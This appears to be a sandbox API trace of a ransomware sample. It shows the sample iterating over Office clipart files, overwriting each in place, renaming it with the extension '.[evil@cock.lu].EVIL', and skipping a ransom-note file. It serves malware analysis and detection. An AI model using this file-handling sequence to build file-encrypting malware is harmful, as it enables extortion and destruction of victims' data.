0 [0170.006] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf.[evil@cock.lu].evil")) returned 1 [0170.007] ??_V@YAXPEAX@Z () returned 0x1 [0170.010] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF", dwFileAttributes=0x200) returned 0 [0170.010] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.010] wcsstr (_Str="SO00941_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.010] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 69 [0170.010] wcscmp (_String1="SO00941_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.010] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00941_.WMF") returned 0x0 [0170.010] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF") returned 0x45 [0170.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.012] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1708, lpOverlapped=0x0) returned 1 [0170.019] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.019] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.019] _errno () returned 0x84b1160840 [0170.019] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.019] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1720, lpOverlapped=0x0) returned 1 [0170.019] CloseHandle (hObject=0x1a8) returned 1 [0170.020] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.020] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.020] __uncaught_exception () returned 0x84b1160800 [0170.020] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.020] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf.[evil@cock.lu].evil")) returned 1 [0170.021] ??_V@YAXPEAX@Z () returned 0x1 [0170.023] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF", dwFileAttributes=0x200) returned 0 [0170.024] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.024] wcsstr (_Str="SO00942_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.024] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 69 [0170.024] wcscmp (_String1="SO00942_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00942_.WMF") returned 0x0 [0170.024] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 0x45 [0170.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.026] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1264, lpOverlapped=0x0) returned 1 [0170.036] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.036] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.036] _errno () returned 0x84b1160840 [0170.036] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0170.036] CloseHandle (hObject=0x1a8) returned 1 [0170.036] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.036] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.036] __uncaught_exception () returned 0x84b1160800 [0170.037] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf.[evil@cock.lu].evil")) returned 1 [0170.038] ??_V@YAXPEAX@Z () returned 0x1 [0170.041] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF", dwFileAttributes=0x200) returned 0 [0170.042] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.042] wcsstr (_Str="SO00943_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 69 [0170.042] wcscmp (_String1="SO00943_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00943_.WMF") returned 0x0 [0170.042] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 0x45 [0170.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.045] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d84, lpOverlapped=0x0) returned 1 [0170.052] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.052] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.052] _errno () returned 0x84b1160840 [0170.052] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.052] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1da0, lpOverlapped=0x0) returned 1 [0170.052] CloseHandle (hObject=0x1a8) returned 1 [0170.052] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.053] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.053] __uncaught_exception () returned 0x84b1160800 [0170.053] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.053] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf.[evil@cock.lu].evil")) returned 1 [0170.054] ??_V@YAXPEAX@Z () returned 0x1 [0170.058] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF", dwFileAttributes=0x200) returned 0 [0170.058] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.058] wcsstr (_Str="SO01044_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.058] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 69 [0170.058] wcscmp (_String1="SO01044_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.058] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01044_.WMF") returned 0x0 [0170.058] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 0x45 [0170.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.061] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xae1a, lpOverlapped=0x0) returned 1 [0170.070] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.071] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.071] _errno () returned 0x84b1160840 [0170.071] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xae20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae20, lpOverlapped=0x0) returned 1 [0170.071] CloseHandle (hObject=0x1a8) returned 1 [0170.071] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.072] __uncaught_exception () returned 0x84b1160800 [0170.072] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf.[evil@cock.lu].evil")) returned 1 [0170.073] ??_V@YAXPEAX@Z () returned 0x1 [0170.077] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF", dwFileAttributes=0x200) returned 0 [0170.077] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.077] wcsstr (_Str="SO01063_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 69 [0170.077] wcscmp (_String1="SO01063_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01063_.WMF") returned 0x0 [0170.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 0x45 [0170.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.080] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b38, lpOverlapped=0x0) returned 1 [0170.089] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.089] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.089] _errno () returned 0x84b1160840 [0170.089] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.089] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5b40, lpOverlapped=0x0) returned 1 [0170.090] CloseHandle (hObject=0x1a8) returned 1 [0170.090] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.090] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.090] __uncaught_exception () returned 0x84b1160800 [0170.090] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.090] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf.[evil@cock.lu].evil")) returned 1 [0170.092] ??_V@YAXPEAX@Z () returned 0x1 [0170.095] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF", dwFileAttributes=0x200) returned 0 [0170.096] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.096] wcsstr (_Str="SO01236_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.096] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF") returned 69 [0170.096] wcscmp (_String1="SO01236_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.096] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01236_.WMF") returned 0x0 [0170.096] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF") returned 0x45 [0170.096] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.098] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1075e, lpOverlapped=0x0) returned 1 [0170.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.112] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.112] _errno () returned 0x84b1160840 [0170.112] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.113] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x10760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10760, lpOverlapped=0x0) returned 1 [0170.113] CloseHandle (hObject=0x1a8) returned 1 [0170.113] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.113] __uncaught_exception () returned 0x84b1160800 [0170.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.114] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf.[evil@cock.lu].evil")) returned 1 [0170.115] ??_V@YAXPEAX@Z () returned 0x1 [0170.118] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF", dwFileAttributes=0x200) returned 0 [0170.119] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.119] wcsstr (_Str="SO01560_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.119] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF") returned 69 [0170.119] wcscmp (_String1="SO01560_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.119] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01560_.WMF") returned 0x0 [0170.119] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF") returned 0x45 [0170.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.121] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43b0, lpOverlapped=0x0) returned 1 [0170.130] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.130] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.130] _errno () returned 0x84b1160840 [0170.130] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.131] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43c0, lpOverlapped=0x0) returned 1 [0170.131] CloseHandle (hObject=0x1a8) returned 1 [0170.131] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.131] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.131] __uncaught_exception () returned 0x84b1160800 [0170.131] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.132] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf.[evil@cock.lu].evil")) returned 1 [0170.133] ??_V@YAXPEAX@Z () returned 0x1 [0170.136] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF", dwFileAttributes=0x200) returned 0 [0170.136] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.136] wcsstr (_Str="SO01561_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.136] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF") returned 69 [0170.137] wcscmp (_String1="SO01561_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.137] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01561_.WMF") returned 0x0 [0170.137] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF") returned 0x45 [0170.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.139] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59d8, lpOverlapped=0x0) returned 1 [0170.148] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.148] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.148] _errno () returned 0x84b1160840 [0170.148] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.148] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x59e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x59e0, lpOverlapped=0x0) returned 1 [0170.149] CloseHandle (hObject=0x1a8) returned 1 [0170.149] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.149] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.149] __uncaught_exception () returned 0x84b1160800 [0170.149] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.149] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf.[evil@cock.lu].evil")) returned 1 [0170.151] 